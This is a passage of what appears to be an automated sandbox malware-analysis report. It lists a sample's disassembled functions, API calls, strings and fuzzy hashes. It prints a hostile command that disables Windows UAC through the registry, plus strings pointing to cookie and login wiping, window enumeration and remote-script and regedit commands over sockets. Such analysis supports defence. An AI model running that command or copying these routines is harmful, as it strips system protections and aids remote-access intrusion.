                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,00415968,00000000), ref: 004084F6
                              • CloseHandle.KERNEL32(?), ref: 00408505
                              • CloseHandle.KERNEL32(?), ref: 0040850A
                              Strings
                              • C:\Windows\System32\cmd.exe, xrefs: 004084F1
                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004084EC
                              • D, xrefs: 004084CD
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CreateProcess
                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                              • API String ID: 2922976086-1747066916
                              • Opcode ID: a99085f489ab2e170cca9d3e23119def7522f92bfbabe080ea7c5488701c172d
                              • Instruction ID: 49ef00a26c30989ba7ed88d2a65af69d250c14a9bd2b913ba13855b573ed4d5e
                              • Opcode Fuzzy Hash: a99085f489ab2e170cca9d3e23119def7522f92bfbabe080ea7c5488701c172d
                              • Instruction Fuzzy Hash: F0F0D0B69005187EEB409BE5DC05EFFBB7DE748710F104421FB01F6160D6B469498A65
                              Function 0040DE63 Relevance: 10.5, APIs: 7, Instructions: 34COMMON
                              Download Yara Rule
                              APIs
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00415268,00000000,6A3F5E04), ref: 0040DE7B
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DE88
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000), ref: 0040DE98
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040DEA1
                              • atoi.MSVCRT ref: 0040DEA8
                                • Part of subcall function 0040DA55: GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000,76E50440,00415268,6A41AFB0), ref: 0040DA80
                                • Part of subcall function 0040DA55: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,76E50440,00415268,6A41AFB0), ref: 0040DA94
                                • Part of subcall function 0040DA55: GetProcAddress.KERNEL32(00000000), ref: 0040DA9B
                                • Part of subcall function 0040DA55: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(76E50440,00415268,6A41AFB0), ref: 0040DAB3
                                • Part of subcall function 0040DA55: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DABC
                                • Part of subcall function 0040DA55: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DAC6
                                • Part of subcall function 0040DA55: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040DB68
                                • Part of subcall function 0040DA55: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040DB86
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DEB9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DEC2
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$??1?$basic_string@?size@?$basic_string@V12@$??0?$basic_string@?find@?$basic_string@?length@?$basic_string@?substr@?$basic_string@AddressD@1@@GdiplusLibraryLoadProcStartupatoi
                              • String ID:
                              • API String ID: 4181878723-0
                              • Opcode ID: 44cda1b0aba01f95a7190a095bd5c6faa0b09c69638a034032fd8e8976cd13aa
                              • Instruction ID: a53c021e27954d43d5d070e7438e4a07455e2c0535f708b4c7a5eec2c33dd71b
                              • Opcode Fuzzy Hash: 44cda1b0aba01f95a7190a095bd5c6faa0b09c69638a034032fd8e8976cd13aa
                              • Instruction Fuzzy Hash: CFF01272500119EBCB04AFA4EC4D9DE7778FB44315B108575F917970A0DFB49984CB58
                              Function 0040ED73 Relevance: 10.5, APIs: 7, Instructions: 31COMMON
                              Download Yara Rule
                              APIs
                              • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000), ref: 0040ED82
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040ED8C
                              • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?,00000000), ref: 0040ED95
                              • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040ED9F
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040EDA9
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2), ref: 0040EDBF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?), ref: 0040EDC8
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                              • String ID:
                              • API String ID: 2478582372-0
                              • Opcode ID: adb46ca283450cb9f2384b23b62c3c9c57bbe05b8ad4d32cfd432fa645a760be
                              • Instruction ID: 1564fe7f85c29674afeedc34bac84888193373dfe958ee75c0cfd53d5d2b696a
                              • Opcode Fuzzy Hash: adb46ca283450cb9f2384b23b62c3c9c57bbe05b8ad4d32cfd432fa645a760be
                              • Instruction Fuzzy Hash: 71F0AF7550010EABCB04EFA0D95D9EE7778FF44305F008465F91697190DBB49E49CB65
                              Function 0040C9DD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                              Download Yara Rule
                              APIs
                              • EnumWindows.USER32(0040C8F3,00000000), ref: 0040C9EB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,windowslist,00415268,00415A20), ref: 0040CA09
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415A20), ref: 0040CA13
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415A20), ref: 0040CA28
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668,?,?,?,?,?,00415A20), ref: 0040CA38
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@??4?$basic_string@EnumV01@V01@@V10@0@V10@@Windows
                              • String ID: windowslist
                              • API String ID: 1943122135-3779825983
                              • Opcode ID: b547f61fa1d04b115500ff6018a40232aa2c76acc4097e1a31bcc498f6059ffc
                              • Instruction ID: fd0eb6cd70df32150fd7f84368215a10c343f41110055329f562a51080181c44
                              • Opcode Fuzzy Hash: b547f61fa1d04b115500ff6018a40232aa2c76acc4097e1a31bcc498f6059ffc
                              • Instruction Fuzzy Hash: A0E0E571AC0218ABD20073A46D4BFEE3B18FA91705F404672FA02711D1EAFC18D882AE
                              Function 0040EE4B Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,6A41AFB0,6A41AFB0,?,0040C5C2,?,00000000), ref: 0040EE57
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EE65
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,0040C5C2,?,00000000), ref: 0040EE87
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,0040C5C2,?,00000000), ref: 0040EEA9
                                • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,0040C5C2,?,00000000), ref: 0040EEBD
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040C5C2,?,00000000), ref: 0040EEC6
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@free
                              • String ID:
                              • API String ID: 1231779380-0
                              • Opcode ID: 8d267b30505027ac71a5795a797b7f15db73b80b7f14e4256d31203b5d1ac008
                              • Instruction ID: b993cd5d2c3ead3800f1df18077c746f948359e482093e15d73946b3c0281b93
                              • Opcode Fuzzy Hash: 8d267b30505027ac71a5795a797b7f15db73b80b7f14e4256d31203b5d1ac008
                              • Instruction Fuzzy Hash: 8F01803220011D9BCB18EB78EC998EF77AAFB88265740443DF907D7290EE709D45CB94
                              Function 00405E72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32 ref: 00405E8C
                              • Sleep.KERNEL32(00001388), ref: 00405EFE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared all cookies & stored logins!],?), ref: 00405F28
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410D48,00000001), ref: 00405F4C
                                • Part of subcall function 00405D53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 00405D64
                                • Part of subcall function 00405D53: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405D8B
                                • Part of subcall function 00405D53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405D94
                                • Part of subcall function 00405D53: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00405DA3
                                • Part of subcall function 00405D53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E1A
                                • Part of subcall function 00405D53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405E67
                              Strings
                              • [Cleared all cookies & stored logins!], xrefs: 00405F23
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                              • String ID: [Cleared all cookies & stored logins!]
                              • API String ID: 3797260644-1894301085
                              • Opcode ID: f199ca515fe3fd297484eb2075cc4a307752a8c1ca9959e62230d6bf913dfe67
                              • Instruction ID: 743c0b0ad3dce683d62215772fc1dcfb9b2edba61c8a76df2461d73b0dcd023a
                              • Opcode Fuzzy Hash: f199ca515fe3fd297484eb2075cc4a307752a8c1ca9959e62230d6bf913dfe67
                              • Instruction Fuzzy Hash: 8F31F461D4A7C8B9EB12E3F555165DF7E748E12200B48C4FFD4C077283D57A0B48976A
                              Function 0040F978 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegisterClassExA.USER32(00000030), ref: 0040F9BE
                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0040F9D9
                              • GetLastError.KERNEL32(?,00000000), ref: 0040F9E3
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: ClassCreateErrorLastRegisterWindow
                              • String ID: 0$MsgWindowClass
                              • API String ID: 2877667751-2410386613
                              • Opcode ID: 4b35dbec49bb3aac694837bfd24467ddf9e7bcdb7fb055d8e4ccf1cf56f59604
                              • Instruction ID: 3bd77cc2a02a113e4efc25ff9f0a79e0b482d680b5cc203598e7dfc1cb382988
                              • Opcode Fuzzy Hash: 4b35dbec49bb3aac694837bfd24467ddf9e7bcdb7fb055d8e4ccf1cf56f59604
                              • Instruction Fuzzy Hash: 93015AB1D01228AACB21DF96EC48ADFBFBDEF45760F004126F510B6280D7B05549CBE4
                              Function 0040D18E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initremscript,00415268,?,?,?,?,?,?,?,?,?,?,?,?,0040BC44), ref: 0040D1CF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040D1D9
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040D1EB
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                                • Part of subcall function 0040221C: malloc.MSVCRT ref: 00402248
                                • Part of subcall function 0040221C: recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                                • Part of subcall function 0040221C: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                                • Part of subcall function 0040221C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                • Part of subcall function 0040221C: free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040D3A5,00000001,?,?,?,?,?,?), ref: 0040D202
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V?$basic_string@$??4?$basic_string@V10@0@V10@@Y?$basic_string@connectfreemallocrecvsocket
                              • String ID: initremscript
                              • API String ID: 1984283922-2453072461
                              • Opcode ID: a3a1c512a8bbe3034cfa995716c64fccf3b81a4b27426af285bb25f05ea61ccc
                              • Instruction ID: 342a5ca8b5c7f20c834f884bab2930fb133c27a797bcc57ebff7080bfdc51c0c
                              • Opcode Fuzzy Hash: a3a1c512a8bbe3034cfa995716c64fccf3b81a4b27426af285bb25f05ea61ccc
                              • Instruction Fuzzy Hash: F5F0A432B4061463D700FAB99D8B9FF7759AA81354B40097EBE016A1C2EAFD9A4C429D
                              Function 00409D91 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initregedit,00415268,?,?,?,?,?,?,?,?,?,?,?,?,0040BC72), ref: 00409DD2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00409DDC
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00409DEE
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                                • Part of subcall function 0040221C: malloc.MSVCRT ref: 00402248
                                • Part of subcall function 0040221C: recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                                • Part of subcall function 0040221C: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                                • Part of subcall function 0040221C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                • Part of subcall function 0040221C: free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040976B,00000000,?,?,?,?,?,?), ref: 00409E05
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V?$basic_string@$??4?$basic_string@V10@0@V10@@Y?$basic_string@connectfreemallocrecvsocket
                              • String ID: initregedit
                              • API String ID: 1984283922-4282871991
                              • Opcode ID: f30660b3cfbb667e63d0ae3de9153243f20a977a78a5d049d9f4742b7f6f2b8b
                              • Instruction ID: ea2ab50fb2608594d56e05149f15f1d9e9310a7c1248ba924dfbe77ee24fa733
                              • Opcode Fuzzy Hash: f30660b3cfbb667e63d0ae3de9153243f20a977a78a5d049d9f4742b7f6f2b8b
                              • Instruction Fuzzy Hash: E3F0F93260060467C700BA759D4B9EF77189A81314B40047EBD01BB1C3EAFC8D48429D
                              Function 00402A2A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                              • String ID: dt@
                              • API String ID: 2505548081-2366654348
                              • Opcode ID: 61a749066b2d00b9c9c648641962aeee84050e9aec5808d4299b9fd5b26a7e54
                              • Instruction ID: 764d4db823161b876fc7299956acb260e9b2acb34382fd8d294e8e186b4e9337
                              • Opcode Fuzzy Hash: 61a749066b2d00b9c9c648641962aeee84050e9aec5808d4299b9fd5b26a7e54
                              • Instruction Fuzzy Hash: B7F0D43150001EEBCF04EF94DC98CEE7B78FB54305B008469B916921A0EBB4AA59CB94
                              Function 00403774 Relevance: 7.5, APIs: 5, Instructions: 45threadCOMMON
                              Download Yara Rule
                              APIs
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F10,00000000,00415940,?,00407B0B,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00403787
                                • Part of subcall function 0040374A: GetKeyboardLayout.USER32(00000000), ref: 0040374F
                              • CreateThread.KERNEL32(00000000,00000000,0040382C,004156C0,00000000,00000000), ref: 004037A6
                              • CreateThread.KERNEL32(00000000,00000000,0040380C,004156C0,00000000,00000000), ref: 004037B6
                              • CreateThread.KERNEL32(00000000,00000000,0040383B,004156C0,00000000,00000000), ref: 004037C2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407B0B,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004037C7
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??4?$basic_string@KeyboardLayoutV01@V01@@
                              • String ID:
                              • API String ID: 2295282396-0
                              • Opcode ID: 14f04f78e8f7430bc4bd69958249ffd5d817d18415e9be8f89f862f13594ae1e
                              • Instruction ID: 83acec77044f58d1f3a1298fcc2b8004ba63f5c21448a1edded433463e12b57e
